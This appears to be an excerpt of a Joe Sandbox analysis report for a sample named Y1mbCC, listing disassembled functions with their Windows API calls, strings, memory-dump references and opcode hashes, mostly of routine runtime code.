Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700

Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002986
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002994
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029A3
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029B1
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029C0
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029CE
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029DD
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029EB

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200

Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 319667368-0
Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300

Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 1390108997-0
Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340

Function 00007FFE148C4CD4 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE148C4E72
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE148C519B

Strings

csm, xrefs: 00007FFE148C4E1B
csm, xrefs: 00007FFE148C4DB9
csm, xrefs: 00007FFE148C4E99

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction ID: 286085104b44869dd36744f0fb536b0f113adf966c038be5f299906fa23a03f4
Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction Fuzzy Hash: 69E1D432908B918AEB109F2AD4C46ED37A0FB46768F940176FE4D57B66CF38E589C740

Function 00007FFE148C95BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFE148C8BC9,?,?,?,?,00007FFE148C8C14), ref: 00007FFE148C95CB
FlsSetValue.KERNEL32(?,?,?,00007FFE148C8BC9,?,?,?,?,00007FFE148C8C14), ref: 00007FFE148C9601
FlsSetValue.KERNEL32(?,?,?,00007FFE148C8BC9,?,?,?,?,00007FFE148C8C14), ref: 00007FFE148C962E
FlsSetValue.KERNEL32(?,?,?,00007FFE148C8BC9,?,?,?,?,00007FFE148C8C14), ref: 00007FFE148C963F
FlsSetValue.KERNEL32(?,?,?,00007FFE148C8BC9,?,?,?,?,00007FFE148C8C14), ref: 00007FFE148C9650
SetLastError.KERNEL32(?,?,?,00007FFE148C8BC9,?,?,?,?,00007FFE148C8C14), ref: 00007FFE148C966B

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction ID: 08b0f98ad20ea70f182dcc20503414528d307b7672c4cea4ea9ac6c8387e40b7
Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction Fuzzy Hash: 4D113030B0EE4246FA54673365D19B961929F4A7B0F8447F5F93E077F6DE2CA44A8300

Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014001385B
LeaveCriticalSection.KERNEL32 ref: 0000000140013872
SetEvent.KERNEL32 ref: 000000014001387F
WaitForSingleObject.KERNEL32 ref: 0000000140013891
CloseHandle.KERNEL32 ref: 000000014001389E
CloseHandle.KERNEL32 ref: 00000001400138AB

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
String ID:
API String ID: 3326452711-0
Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705

Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 00000001400037D3
#4.VSELOG ref: 0000000140003823
EnterCriticalSection.KERNEL32 ref: 000000014000382F
LeaveCriticalSection.KERNEL32 ref: 00000001400038B7

Strings

amps_Exec: pHandle=%p, execId=%d, iParam=%d, xrefs: 000000014000380B

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
API String ID: 2984211723-1229430080
Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740

Function 00007FFE148C7F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FFE148C7F4D
GetProcAddress.KERNEL32 ref: 00007FFE148C7F63
FreeLibrary.KERNEL32 ref: 00007FFE148C7F8A

Strings

CorExitProcess, xrefs: 00007FFE148C7F5C
mscoree.dll, xrefs: 00007FFE148C7F44

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction ID: 689ca3570c4a8af431a97cea35ab75af647ab79cfd331d9fedab50378c6eccf7
Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction Fuzzy Hash: 1AF04F61A1AF0281EA10AB26A4C47796320AF8A7B1F9403B5EA6D467F4CF2CD44DC340

Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
ExitProcess.KERNEL32 ref: 0000000140008545

Strings

mscoree.dll, xrefs: 0000000140008518
CorExitProcess, xrefs: 000000014000852A

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340

Function 00007FFE148C40D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FFE148C41F7
__AdjustPointer.LIBCMT ref: 00007FFE148C4242

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction ID: f869c45e6512a3c7ecb99266339f5af8c1b8136945c3de53a9005aafaeaabde1
Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction Fuzzy Hash: 9FB1C731E0AE4281EA65DB1B90C1DB86390EF56FB4F9584B5FE4D077A5DE3CE48A8340

Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 0000000140009F76

Part of subcall function 0000000140008370: Sleep.KERNEL32(?,?,00000000,0000000140005545), ref: 00000001400083C0

GetFileType.KERNEL32 ref: 000000014000A11C

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID:
API String ID: 1527402494-0
Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301

Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E3E
GetLastError.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E5E
GetCommandLineA.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E9B
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009EBB

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CommandLine$ByteCharErrorLastMultiWide
String ID:
API String ID: 3078728599-0
Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00

Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDAC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDC7

Part of subcall function 0000000140010B30: CreateFileA.KERNEL32 ref: 0000000140010B5A

GetConsoleOutputCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDDC
WideCharToMultiByte.KERNEL32 ref: 000000014000FE0D
WriteConsoleA.KERNEL32 ref: 000000014000FE32

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
String ID:
API String ID: 1850339568-0
Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00

Function 00007FFE148CFB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FFE148CFB7C
_set_statfp.LIBCMT ref: 00007FFE148CFB97
_set_statfp.LIBCMT ref: 00007FFE148CFBB3
_set_statfp.LIBCMT ref: 00007FFE148CFBEF

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction ID: 854e4b8a9632c04434a5ebb607d345cc25a3334eda9645688ec555665ca3060c
Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction Fuzzy Hash: 02116072E18F0B02F654116AE5F67B910416F9B3B4F9446B4F7AE167FA8F2CA8498301

Function 00007FFE148C9684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FFE148C766F,?,?,00000000,00007FFE148C790A,?,?,?,?,?,00007FFE148C7896), ref: 00007FFE148C96A3
FlsSetValue.KERNEL32(?,?,?,00007FFE148C766F,?,?,00000000,00007FFE148C790A,?,?,?,?,?,00007FFE148C7896), ref: 00007FFE148C96C2
FlsSetValue.KERNEL32(?,?,?,00007FFE148C766F,?,?,00000000,00007FFE148C790A,?,?,?,?,?,00007FFE148C7896), ref: 00007FFE148C96EA
FlsSetValue.KERNEL32(?,?,?,00007FFE148C766F,?,?,00000000,00007FFE148C790A,?,?,?,?,?,00007FFE148C7896), ref: 00007FFE148C96FB
FlsSetValue.KERNEL32(?,?,?,00007FFE148C766F,?,?,00000000,00007FFE148C790A,?,?,?,?,?,00007FFE148C7896), ref: 00007FFE148C970C

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction ID: 7e4c379a7d9379d82df8ecfde8992595b456868730a10415fa79145a9b60f15b
Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction Fuzzy Hash: B5113D30A0EE4285FA586B3765D19B961819F463F0F9453F5F86D067F6EE2CA44A8300

Function 00007FFE148C9518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FFE148C9529
FlsSetValue.KERNEL32 ref: 00007FFE148C9548
FlsSetValue.KERNEL32 ref: 00007FFE148C9570
FlsSetValue.KERNEL32 ref: 00007FFE148C9581
FlsSetValue.KERNEL32 ref: 00007FFE148C9592

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction ID: 2b41b639836f35e87bddba213451022964ffb243a8a956d4e2bd424ff7b58fa0
Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction Fuzzy Hash: F211DA70A0EE465AFA686A3354D19F915818F46370F9417F4F53E0A3F2DD2CB44A9700

Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000014000A3AF
GetCurrentProcessId.KERNEL32 ref: 000000014000A3BA
GetCurrentThreadId.KERNEL32 ref: 000000014000A3C6
GetTickCount.KERNEL32 ref: 000000014000A3D2
QueryPerformanceCounter.KERNEL32 ref: 000000014000A3E3

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

